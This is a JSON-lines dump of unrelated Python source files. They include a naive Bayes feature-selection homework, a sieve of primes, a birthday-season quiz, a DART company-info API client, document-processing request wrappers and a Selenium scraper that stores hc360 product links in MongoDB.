describe which and what parameters you used.\n ii. Summarize the results: how many features were selected and which features selected? If your method simply returns \n a ranked list of all 215 features, choose a subset by applying an arbitrary cutoff score to the ranked list. Describe \n your approach.\nc) Classification: using a naïve Bayes classifier:\ni. Which parameters must be set by the user (briefly describe their meaning)\nii. When creating a hold-out test set, what is stratified sampling and how is it applicable here? (~20 words)\niii. For the original feature set (215 features): Conduct a 5-fold cross-validation test. Provide \nthe confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \nGenerate a ROC curve and a precision-recall curve.\niv. Repeat iii using your optimal feature set from b-iii) above.\nv. Which feature set led to the best performance? (discuss difference in observed performance metrics; ~50 words)\n\"\"\"\nimport sklearn as sk\nimport pandas as pa\nimport seaborn as se\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_selection import SelectPercentile, f_classif\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.naive_bayes import GaussianNB\nfrom train import get_train\nfrom get_accuracy import get_accuracy\n\n# Load the data (note that there is no header line and that the ‘last’ attribute should be considered as the nominal class).\n\nnames = []\nfor i in range(1,216):\n name = \"feature\" + str(i)\n names.append(name)\nnames.append('classes')\ndata = pa.read_csv('assigData4.csv',names = names)\n\n# Plot the distribution of feature 15 for the two classes on a single histogram.\n\nfeature15class0 = []\nfor j in range(0,7200):\n if data.classes[j] == 0:\n feature15class0.append(data.feature15[j])\nse.distplot(feature15class0, bins = 50, kde = False, label = \"class=0\")\nplt.legend()\nfeature15class1 = []\nfor k in range(0, 7200):\n if data.classes[k] == 1:\n feature15class1.append(data.feature15[k])\nse.distplot(feature15class1, color = 'red', bins = 50, kde = False, label = \"class=1\")\nplt.legend()\n\n# Plot a scatterplot illustrating the correlation between features 3 and 8, colouring the data by class\n\nplt.figure()\nse.scatterplot(x = \"feature3\", y = \"feature8\", data = data,hue='classes')\n\n#I use the SelectPercentile with f_classif method, which use chi2 , and then choose the features of\n#the highest percentile of the scores. the parameter : score_func=, percentile\n\nY = pa.Series(data.classes).values\ndataupdate = data.drop(columns = 'classes')\nX = dataupdate.values\nX_new = SelectPercentile(f_classif, percentile = 70)\nX_new.fit_transform(X,Y)\nselectedfeatureindices = X_new.get_support(indices = True)\na=[]\nfor l in list(range(len(selectedfeatureindices))):\n b = (\"feature\" + str(selectedfeatureindices[l] + 1))\n a.append(b)\nprint(a)\n\"\"\"I select 150 features, 'feature1', 'feature2', 'feature3', 'feature4', 'feature5',\n'feature6', 'feature7', 'feature8', 'feature9', 'feature10', 'feature11', 'feature12',\n'feature13', 'feature14', 'feature15', 'feature16', 'feature17', 'feature18', 'feature19',\n'feature20', 'feature21', 'feature22', 'feature23', 'feature24', 'feature25', 'feature26',\n'feature27', 'feature28', 'feature31', 'feature32', 'feature33', 'feature34', 'feature35',\n'feature36', 'feature37', 'feature38', 'feature39','feature40', 'feature41', 'feature42',\n'feature43', 'feature44', 'feature45', 'feature47', 'feature49', 'feature54', 'feature55',\n'feature56', 'feature59', 'feature60', 'feature61', 'feature65', 'feature66', 'feature67',\n'feature68', 'feature69', 'feature70', 'feature71', 'feature72', 'feature73', 'feature74',\n'feature75', 'feature76', 'feature77', 'feature78', 'feature79', 'feature80', 'feature84',\n'feature85', 'feature89', 'feature90', 'feature91', 'feature93', 'feature95', 'feature96',\n'feature97', 'feature98', 'feature99', 'feature100', 'feature103', 'feature104', 'feature105',\n'feature106', 'feature108', 'feature109', 'feature110', 'feature112', 'feature116', 'feature119',\n'feature120', 'feature121', 'feature122', 'feature123', 'feature124', 'feature126', 'feature129',\n'feature132', 'feature136', 'feature137', 'feature138', 'feature139', 'feature140', 'feature142',\n'feature143', 'feature145', 'feature146', 'feature147', 'feature148', 'feature149', 'feature150',\n'feature151', 'feature154', 'feature155', 'feature156', 'feature157', 'feature159', 'feature161',\n'feature162', 'feature163', 'feature164', 'feature165', 'feature167', 'feature169', 'feature170',\n'feature171', 'feature172', 'feature173', 'feature174', 'feature175', 'feature178', 'feature179',\n'feature180', 'feature182', 'feature184', 'feature185', 'feature194', 'feature196', 'feature197',\n'feature200', 'feature201', 'feature202', 'feature203', 'feature204', 'feature209', 'feature210',\n'feature211', 'feature212', 'feature213', 'feature214', 'feature215'.\"\"\"\n\n# For the original feature set (215 features): Conduct a 5-fold cross-validation test. Provide \n# the confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \n# Generate a ROC curve and a precision-recall curve.\n\ndataarray = dataupdate.values\nclassarray = data.classes.values\nc = sk.model_selection.StratifiedShuffleSplit(n_splits = 1, test_size = 0.2)\nfor train_index, test_index in c.split(dataarray, classarray):\n print(\"TRAIN:\", train_index, \"TEST:\", test_index)\nX_train, X_test = dataarray[train_index], dataarray[test_index]\ny_train, y_test = classarray[train_index], classarray[test_index]\ngnb = GaussianNB()\ngnb.fit(X_train, y_train)\nscore = gnb.predict_proba(X_train)[:, 1]\ny_pred = sk.model_selection.cross_val_predict(gnb,X_train, y_train, groups = None, cv = 5, verbose = 2)\nconfusionmatrix = sk.metrics.confusion_matrix(y_train, y_pred)\nTP = confusionmatrix[1,1]\nFP = confusionmatrix[0,1]\nFN = confusionmatrix[1,0]\nTN = confusionmatrix[0,0]\nprint(\"confusion matrix is \",([TP,FP],[FN,TN]))\ntrainaccuracy, trainprecision, trainsensitivity, trainspecificity = get_train(TP, FP, TN, FN)\nprint(\"the accuracy is\", trainaccuracy)\nprint(\"the precision is\", trainprecision)\nprint(\"the sensitivity is\", trainsensitivity)\nprint(\"the trainspecificity is\", trainspecificity)\nfpr, tpr, thresholds = sk.metrics.roc_curve(y_train, score)\nplt.figure()\nplt.scatter(fpr,tpr)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel(\"trainFPR\")\nplt.ylabel(\"trainTPR\")\nplt.show()\ny_score = gnb.predict_proba(X_train)\nprecision, recall, threshold = sk.metrics.precision_recall_curve(y_train,y_score[:,1])\nplt.figure()\nplt.plot(recall, precision)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel('trainrecall')\nplt.ylabel('trainprecision')\nplt.show()\n\n#For the optimal feature set : Conduct a 5-fold cross-validation test. Provide \n#the confusion matrix, the accuracy, the precision, the sensitivity, and the specificity. \n#Generate a ROC curve and a precision-recall curve.\n\ndataarraynew=data[a].values\nclassarraynew=data.classes.values\ns = sk.model_selection.StratifiedShuffleSplit(n_splits=1, test_size=0.2)\nfor train_indexnew, test_indexnew in s.split(dataarraynew, classarraynew):\n print(\"TRAIN:\", train_indexnew, \"TEST:\", test_indexnew)\nX_trainnew, X_testnew = dataarraynew[train_indexnew], dataarraynew[test_indexnew]\ny_trainnew, y_testnew = classarraynew[train_indexnew], classarraynew[test_indexnew]\ngnbnew = GaussianNB()\ngnbnew.fit(X_trainnew,y_trainnew)\nscorenew = gnbnew.predict_proba(X_trainnew)[:, 1]\ny_prednew = sk.model_selection.cross_val_predict(gnbnew,X_trainnew, y_trainnew, groups=None, cv=5, verbose=2)\nconfusionmatrixnew = sk.metrics.confusion_matrix(y_trainnew, y_prednew)\nTPnew = confusionmatrixnew[1,1]\nFPnew = confusionmatrixnew[0,1]\nFNnew = confusionmatrixnew[1,0]\nTNnew = confusionmatrixnew[0,0]\nprint(\"confusion matrix is \",([TPnew,FPnew],[FNnew,TNnew]))\ntrainaccuracynew,trainprecisionew, trainsensitivitynew, trainspecificitynew = get_train(TPnew, FPnew, TNnew, FNnew)\nprint(\"the accuracy is\",trainaccuracynew)\nprint(\"the precision is\",trainprecisionew)\nprint(\"the sensitivity is\",trainsensitivitynew)\nprint(\"the trainspecificity is\",trainspecificitynew)\nfprnew, tprnew, thresholdsnew = sk.metrics.roc_curve(y_trainnew, scorenew)\nplt.figure()\nplt.scatter(fprnew,tprnew)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel(\"trainFPRnew\")\nplt.ylabel(\"trainTPRnew\")\nplt.show()\ny_scorenew = gnbnew.predict_proba(X_trainnew)\nprecisionnew, recallnew, thresholdnew = sk.metrics.precision_recall_curve(y_trainnew, y_scorenew[:,1])\nplt.figure()\nplt.plot(recallnew, precisionnew)\nplt.xlim(0,1)\nplt.ylim(0,1)\nplt.xlabel('trainrecallnew')\nplt.ylabel('trainprecisionnew')\nplt.show()\n\n# get the accuracy of different dataset\nytrainaccuracy = get_accuracy(gnb, X_train, y_train)\nprint(\"the accuracy on the train set of the original data is\",ytrainaccuracy)\nytrainnewaccuracy = get_accuracy(gnbnew, X_trainnew, y_trainnew)\nprint(\"the accuracy on the train set of the selecting data is\",ytrainnewaccuracy)\nytestaccuracy = get_accuracy(gnb, X_test, y_test)\nprint(\"the accuracy on the test set of the original data is\",ytestaccuracy)\nytestnewaccuracy = get_accuracy(gnbnew, X_testnew, y_testnew)\nprint(\"the accuracy on the test set of the selecting data is\",ytestnewaccuracy)\n","sub_path":"assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":10651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165492633","text":"macos= int(input(\"Quantos cigarros por dia? \"))\n\ntempo= int(input(\"Quantos anos fuma? \"))\n\n#1 cigarro 10min de vida #1 dia= 24*60 min\n\ndef perdido (macos,tempo):\n m=macos*10*365*tempo #minutos perdidos nos anos de fumo\n dia= m/(24*60)\n return dia\n\nvida= perdido(macos,tempo)\n\nprint(\"Tempo perdido: {0} dias\".format(vida))","sub_path":"backup/user_314/ch22_2020_09_02_19_56_54_169012.py","file_name":"ch22_2020_09_02_19_56_54_169012.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"378001094","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# 종목코드를 고유변호로 변환 (함수 정의)\ndef get_code(stock_code): \n # 고유번호 리스트 파일 불러오기 \n XML_PATH = \"./data/CORPCODE.xml\"\n infile = open(XML_PATH,\"r\", encoding='utf-8')\n code_xml = infile.read()\n soup_xml = BeautifulSoup(code_xml,'html.parser')\n\n # 종목코드를 찾고, 고유번호를 추출\n items = soup_xml.find_all('list') \n for item in items:\n scode = item.find('stock_code').text\n if str(scode)==str(stock_code):\n corp_code = item.find('corp_code').text\n print('고유번호: %s' % corp_code)\n return corp_code\n \n print('Failed to get the proper code...') \n return None\n\n# Open DART 접속\nif __name__==\"__main__\":\n\n # DART 전자공시 사이트 APT 인증키 입력\n my_auth_key = \"---발급받은 개인 키를 입력하세요---\" \n \n # 기업개황 정보 접속 URL\n crp_cd = get_code(\"005380\")\n url = \"https://opendart.fss.or.kr/api/company.xml?crtfc_key=\"+my_auth_key+\"&corp_code=\"+crp_cd\n\n # BeautifulSoup으로 API가 반환하는 XML 해석하여 dataframe으로 정리\n xml = requests.get(url)\n soup = BeautifulSoup(xml.text, 'html.parser') \n\n corp_name = soup.find('corp_name').text\n corp_name_eng = soup.find('corp_name_eng').text\n stock_name = soup.find('stock_name').text\n stock_code = soup.find('stock_code').text\n ceo_nm = soup.find('ceo_nm').text\n corp_cls = soup.find('corp_cls').text\n jurir_no = soup.find('jurir_no').text\n bizr_no = soup.find('bizr_no').text\n adres = soup.find('adres').text\n hm_url = soup.find('hm_url').text\n ir_url = soup.find('ir_url').text\n phn_no = soup.find('phn_no').text\n fax_no = soup.find('fax_no').text\n induty_code = soup.find('induty_code').text\n est_dt = soup.find('est_dt').text\n acc_mt = soup.find('acc_mt').text\n \n company_info = {'corp_name':corp_name,\n 'corp_name_eng':corp_name_eng,\n 'stock_name':stock_name,\n 'stock_code':stock_code,\n 'ceo_nm':ceo_nm,\n 'corp_cls':corp_cls,\n 'jurir_no':jurir_no,\n 'bizr_no':bizr_no,\n 'adres':adres,\n 'hm_url':hm_url,\n 'ir_url':ir_url,\n 'phn_no':phn_no,\n 'fax_no':fax_no,\n 'induty_code':induty_code,\n 'est_dt':est_dt,\n 'acc_mt':acc_mt, \n }\n\nprint(company_info)","sub_path":"5674-849/044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"94525764","text":"import time\nimport requests\nimport json\nimport os\nimport logging\n\nfrom xpmsrequests.data import DataVariables\nfrom xpmsrequests.rangerrequests import requestsrangerbase\n\nclass RangerReq(requestsrangerbase.RangerBase):\n TempDocID = ''\n def __init__(self):\n # Create the Logger\n super(RangerReq,self).__init__()\n self.logger = logging.getLogger(__name__)\n # *****************************************************************************************************\n # *****************************************************************************************************\n\n def getDataByJobId(self,JobId):\n self.logger.info('Into getDataByJobId method')\n jobIdUrl = DataVariables.RangerJobIdUrl+JobId\n self.logger.info('JobIdUrl is :'+jobIdUrl)\n status = 'in-progress'\n processStatus = 'process_status'\n\n try:\n count = 1\n while (count <= DataVariables.TimeOut):\n tempJson = requests.get(jobIdUrl).json()\n if(count > DataVariables.TimeOut):\n self.logger.error('Time Count Exceeded')\n return None\n if (tempJson[processStatus] != status):\n print('Exited while')\n self.logger.info('Returning Json :'+str(tempJson))\n return tempJson\n if (tempJson[processStatus] == status):\n self.logger.info('Into Sleep')\n self.logger.info('Sleep Time is : '+str(DataVariables.PollTime))\n time.sleep(DataVariables.PollTime)\n count += 1\n self.logger.info('count is :'+str(count))\n except:\n print('Unable to generate response')\n self.logger.error('Unable to generate response')\n\n\n # *****************************************************************************************************\n # *****************************************************************************************************\n\n def upLoadReq(self, imgUrl):\n\n self.logger.info('Into upLoadReq method')\n files = {'file': open(imgUrl, 'rb')}\n # self.logger.info('file is:'+str(files))\n response = requests.post(DataVariables.RangerUploadURL, files=files)\n self.logger.info('Response Json after uploading image is' + str(response.json()))\n if (response.status_code == 200):\n self.logger.info(\n 'Status of Response returned after uploading the image is ' + str(response.status_code))\n return response.json()\n else:\n self.logger.error(\n 'Status of Response returned after uploading the image is' + str(response.status_code))\n return None\n\n # *****************************************************************************************************\n\n def insightIngest(self, uploadjson):\n self.logger.info('Into Insight Ingest method')\n jsonFileData = self.getJsonFileData(DataVariables.Insightingestjson)\n self.logger.info('The body Of insight Ingest Json Is :' + str(jsonFileData))\n jsonFileData['data']['file_path'][0] = uploadjson['metadata']['file_path']\n jsonFileData['data']['request_type'] = 'ingest_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight Ingest json after assigning metadata of Upload json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n ingestFileJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by insightIngest is :' + str(ingestFileJobID))\n return ingestFileJobID\n\n # *****************************************************************************************************\n\n def insightExtractDocumentMetadata(self,injestInsightJson):\n self.logger.info('Into insightExtractDocumentMetadata method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of Getinsight Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n jsonFileData['data']['doc_id'] = injestInsightJson['result']['metadata']['insights'][0]['insight']['doc_id']\n RangerReq.TempDocID = jsonFileData['data']['doc_id']\n print('$$$$$$$$$$$$$$The Doc Id Is $$$$$$$$$$$$$$$$$$',jsonFileData['data']['doc_id'])\n self.logger.info('$$$$$$$$$$$$$$The Doc Id Is $$$$$$$$$$$$$$$$$$'+ str(jsonFileData['data']['doc_id']))\n jsonFileData['data']['request_type'] = 'extract_document_metadata'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of InsightIngest json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentMetadataJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by insightExtractDocumentMetadata is :' + str(insightExtractDocumentMetadataJobID))\n return insightExtractDocumentMetadataJobID\n\n # *****************************************************************************************************\n\n def insightConvertDocument(self,insightExtractDocumentMetadataJson):\n self.logger.info('Into insightConvertDocument method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n jsonFileData['data']['doc_id'] = insightExtractDocumentMetadataJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'convert_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ExtractDocumentMetadata json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightConvertDocumentJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ConvertDocumentJobID is :' + str(insightConvertDocumentJobID))\n return insightConvertDocumentJobID\n\n # *****************************************************************************************************\n\n def insightClassifyDocument(self,insightConvertDocumentJson):\n self.logger.info('Into insightClassifyDocument method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightConvertDocumentJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'classify_document'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ConvertDocument json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightClassifyDocumentJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ClassifyDocumentJobID is :' + str(insightClassifyDocumentJobID))\n return insightClassifyDocumentJobID\n\n # *****************************************************************************************************\n\n def insightExtractDocumentElements(self,insightClassifyDocumentJson):\n self.logger.info('Into insightExtractDocumentElements method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightClassifyDocumentJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'extract_document_elements'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ClassifyDocument json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentElementsJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ExtractDocumentElementsJobID is :' + str(insightExtractDocumentElementsJobID))\n return insightExtractDocumentElementsJobID\n\n # *****************************************************************************************************\n def insightExtractDocumentText(self,insightExtractDocumentElementsJson):\n self.logger.info('Into insightExtractDocumentText method')\n jsonFileData = self.getJsonFileData(DataVariables.GetInsightJson)\n self.logger.info('The body Of jsonFileData Json Is :' + str(jsonFileData))\n #import pdb;pdb.set_trace()\n #jsonFileData['data']['doc_id'] = insightExtractDocumentElementsJson['result']['metadata']['insights'][0]['request']['data']['doc_id']\n jsonFileData['data']['doc_id'] = RangerReq.TempDocID\n jsonFileData['data']['request_type'] = 'extract_document_text'\n jsonFileData['entity_id'] = DataVariables.entityId\n jsonFileData['solution_id'] = DataVariables.solutionId\n\n self.logger.info(\n 'Insight json after assigning metadata of ExtractDocumentElements json and RequestType,EntityID and Solution Is is :' + str(\n jsonFileData))\n\n insightExtractDocumentTextJobID = self.getResponse(DataVariables.GetInsightURL, jsonFileData)\n self.logger.info('Job Id returned by ExtractDocumentElementsJobID is :' + str(insightExtractDocumentTextJobID))\n return insightExtractDocumentTextJobID\n\n","sub_path":"xpmsrequests/rangerrequests/requestsranger.py","file_name":"requestsranger.py","file_ext":"py","file_size_in_byte":10447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396585292","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/webmpris/urls.py\n# Compiled at: 2013-11-14 22:46:20\nfrom django.conf.urls import patterns, url\nfrom webmpris.views import Root, Player, TrackList, Playlists\nOBJ_MAP = {'Root': Root, 'Player': Player, \n 'TrackList': TrackList, \n 'Playlists': Playlists}\nurlpatterns = patterns('webmpris.views', url('^players$', 'get_players', name='players'))\nfor name, obj in OBJ_MAP.items():\n url_prop = ('^players/(?P:[\\\\w.]+)/{name}$').format(name=name)\n url_meth = url_prop[:-1] + '/(?P[\\\\w]+$)'\n urlpatterns += patterns('', url(url_prop, obj.as_view()), url(url_meth, obj.as_view()))","sub_path":"pycfiles/webmpris-1.1-py2.7/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"574126520","text":"# return a list ret that contains all prime numbers <= N\ndef sieve_algorithm(N):\n myList = [True] * (N+1);\n\n for i in range(2,N+1):\n if myList[i]==True:\n j=2;\n while j*i<=N:\n myList[j*i] = False\n j+=1\n\n ret = []\n for i in range(2,N+1):\n if(myList[i]):\n ret.append(i)\n\n return ret\n\nprint(sieve_algorithm(11))\n","sub_path":"sieve.py","file_name":"sieve.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"260000945","text":"\"\"\"\nbirthday.py\nAuthor: Esther Hacker\nCredit: N/A\nAssignment: Birthday Problem\n\nYour program will ask the user the following questions, in this order:\n\n1. Their name.\n2. The name of the month they were born in (e.g. \"September\").\n3. The year they were born in (e.g. \"1962\").\n4. The day they were born on (e.g. \"11\").\n\nIf the user's birthday fell on October 31, then respond with:\n\n You were born on Halloween!\n\nIf the user's birthday fell on today's date, then respond with:\n\n Happy birthday!\n\nOtherwise respond with a statement like this:\n\n Peter, you are a winter baby of the nineties.\n\nExample Session\n\n Hello, what is your name? Eric\n Hi Eric, what was the name of the month you were born in? September\n And what year were you born in, Eric? 1972\n And the day? 11\n Eric, you are a fall baby of the stone age.\n\"\"\"\nfrom datetime import datetime\nfrom calendar import month_name\ntodaymonth = datetime.today().month\ntodaydate = int(datetime.today().day)\ntodayyear = int(datetime.today().year)\n\ntodaymonthname = month_name[todaymonth].lower()\n\nname = input(\"Hello, what is your name? \")\nmonth = input(\"Hi \" + name + \", what is the name of the month you were born in? \")\nmonth = month.lower()\nday = int(input(\"And what day of the month were you born on, \" + name + \"? \"))\nyear = int(input(\"And the year? \"))\n\nif month == \"october\" and day == 31:\n print(\"You were born on Halloween!\")\n \nelse:\n if month == todaymonthname and day == todaydate:\n print(\"Happy birthday!\")\n\n else:\n if month == \"december\" or month == \"january\" or month == \"february\":\n season = \"winter\"\n \n if month == \"march\" or month == \"april\" or month == \"may\":\n season = \"spring\"\n \n if month == \"june\" or month == \"july\" or month == \"august\":\n season = \"summer\"\n \n if month == \"september\" or month == \"october\" or month == \"november\":\n season = \"fall\"\n \n if year in range(1980, 1990):\n decade = \"eighties\"\n \n if year in range(1990, 2000):\n decade = \"nineties\"\n \n if year in range(2000, todayyear):\n decade = \"two thousands\"\n \n if year not in range(1980, todayyear):\n decade = \"stone age\"\n \n print(name + \", you are a \" + season + \" baby of the \" + decade + \".\")\n","sub_path":"birthday.py","file_name":"birthday.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"206420513","text":"import logging\nimport time\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium import webdriver\nfrom lxml import etree\nimport pymongo\n\nclass Selenium():\n def __init__(self, timeout=None):\n self.logger = logging.getLogger(__name__)\n self.timeout = 20\n self.browser = webdriver.Chrome()\n # self.browser.set_window_size(1400, 700)\n self.browser.set_page_load_timeout(self.timeout)\n self.wait = WebDriverWait(self.browser, self.timeout)\n self.client = pymongo.MongoClient('localhost')\n self.db = self.client['new_hc']\n\n def __del__(self):\n self.browser.close()\n\n def process(self,url,tag):\n self.logger.debug('Chrome is Starting')\n try:\n self.browser.get(url)\n time.sleep(0.5)\n # ActionChains(self.browser).send_keys(Keys.DOWN).perform()\n try:\n js = \"var q=document.documentElement.scrollTop=500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1200\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1800\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=2500\"\n self.browser.execute_script(js)\n time.sleep(1)\n js = \"var q=document.documentElement.scrollTop=3200\"\n self.browser.execute_script(js)\n time.sleep(1)\n js = \"var q=document.documentElement.scrollTop=3700\"\n self.browser.execute_script(js)\n time.sleep(1)\n except:\n js = \"var q=document.documentElement.scrollTop=500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1000\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=1500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=2300\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=3500\"\n self.browser.execute_script(js)\n time.sleep(0.5)\n js = \"var q=document.documentElement.scrollTop=4000\"\n self.browser.execute_script(js)\n self.parse_detail(self.browser.page_source,tag)\n except TimeoutException:\n ActionChains(self.browser).send_keys(Keys.F5).perform()\n time.sleep(1)\n return self.process(url,tag)\n return self.browser\n\n def parse_detail(self, response,tag):\n # print(response.url)\n # item = response.meta['item']\n doc = etree.HTML(response)\n urls = doc.xpath(\"//div[@class='picmid pRel']\")\n print(len(urls))\n for url in urls:\n sub_url = url.xpath(\"./a/@href\")[0]\n # print(sub_url)\n if 'http' in sub_url:\n continue\n sub_url = 'https:' + sub_url\n item = {'link':sub_url,'tag': tag}\n if self.db['link'].update({'link':sub_url},{'$set': item},True):\n print('成功保存到mongo',tag,sub_url)\n else:\n print('No Mongo')\n # # yield item\n # yield scrapy.Request(sub_url, callback=self.parse_sh, dont_filter=True)\n page = doc.xpath(\"//span[@class='page_next page-n']/a[@title='下一页']/@href\")\n if page:\n next_page = 'https:' + page[0]\n print('当前页', next_page, '-------------')\n return self.process(next_page,tag)\n # yield scrapy.Request(next_page,callback=self.parse_detail,dont_filter=True)\n else:\n print(\"页面枯竭\")\n pass\n\n def run(self):\n # print(self.db.get_collection('hc').find({}).count())\n for url in self.db.get_collection('link').find({}):\n print(url)\n self.process(url['big_link'],url['tag'])\n # self.parse_detail(html)\n\nif __name__ == '__main__':\n hc = Selenium()\n hc.run()\n\n\n\n# import requests\n# import pymongo\n# from lxml import etree\n# client = pymongo.MongoClient('localhost')\n# db = client['new_hc']\n# headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'}\n# response = requests.get(\"http://www.js.hc360.com/\",headers=headers)\n\n","sub_path":"hc_selenium.py","file_name":"hc_selenium.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"299544200","text":"#!/usr/bin/env python3\n#author:Alnk(李成果)\nimport os\nfrom course_system.core.Basic import Basic\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\nclass School(Basic):\n '''学校类'''\n def __init__(self):\n pass\n def create_school(self,school_name,school_addr):\n '''创建学校'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/school.json\"):\n school_dict = Basic.read(self,'school.json')\n else:\n school_dict = {}\n school_dict[school_name] = {'addr':school_addr}\n w = Basic()\n w.write(school_dict,'school.json')\n print('学校[%s] 地址[%s] 创建成功!' % (school_name, school_addr))\n def create_course(self,school_name,course_name,course_tuition):\n '''创建课程'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/course.json\"):\n course_dict = Basic.read(self,'course.json')\n else:\n course_dict ={}\n course_dict[course_name] = {'school':school_name,'stution':course_tuition}\n w = Basic()\n w.write(course_dict,'course.json')\n print('[%s]学校的[%s]课程创立成功!' %(school_name,course_name))\n def create_teacher(self,teacher_name,teacher_salary,school_name):\n '''创建老师'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/teacher.json\"):\n teacher_dict = Basic.read(self,'teacher.json')\n else:\n teacher_dict = {}\n teacher_dict[teacher_name] = {'school': school_name,'salary': teacher_salary,}\n Basic.write(self, teacher_dict, 'teacher.json')\n print('[%s]老师雇佣成功'%teacher_name)\n def create_grade(self,school_name,grade_name,course_name,teacher_name):\n '''创建班级'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/grade.json\"):\n grade_dict = Basic.read(self,'grade.json')\n else:\n grade_dict = {}\n grade_dict[grade_name] = {'school':school_name,'course':course_name,'teacher':teacher_name,'student':[]}\n w = Basic()\n w.write(grade_dict,'grade.json')\n print('[%s]班级创建成功'%grade_name)","sub_path":"day06/02作业/course_system/core/School.py","file_name":"School.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 